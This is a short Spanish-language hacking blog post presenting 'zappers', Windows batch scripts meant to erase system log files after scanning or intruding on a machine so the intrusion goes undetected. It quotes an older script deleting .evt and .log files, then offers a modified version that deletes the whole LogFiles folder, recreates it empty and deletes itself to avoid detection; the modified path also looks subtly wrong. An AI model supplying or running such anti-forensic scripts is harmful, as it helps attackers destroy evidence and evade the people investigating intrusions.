Cada vez que scanneamos, hacemos una intrusion, un ping  una pc o una ip, esta deja un registro en C:\Windows\System32\LogFiles
Los Zappers sirven para borrar esos registros o logs y asi que no se sospeche o no tengan formas de descubrirnos.

Mirando un poco el codigo de Panzer de IH. Decidi modificarlo un poco, ya que note que en Windows 7 no funcionaria.
Su Codigo es el siguiente:

@echo off
pushd %systemroot%\system32\logfiles
del /f /q *.evt
del /f /q *.log
exit

Lo que hace es dirigirse al directorio de logfiles y borrar todos los *.evt y *.log que hay en ella. Pero note que en Windows 7 y posteriores no funciona, crea directorios y dentro de estos directorio, archivos con extensiones *.txt, *.evl entre otras…

He optado por modificar un poco el codigo:

@echo off
rd /s /q %systemroot%\Windows\System32\LogFiles
md %systemroot%\Windows\System32\LogFiles
del /f /q %0
exit

Lo que hace este codigo es eliminar la carpeta LogFiles con todo su arbol (Directorios y Archivos) y la vuelve a crear vacia. Despues de hacer estas dos cosas, se autoelimina el zapper para evitar ser detectado.

ANTRAX

POSTS SIMILARES

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *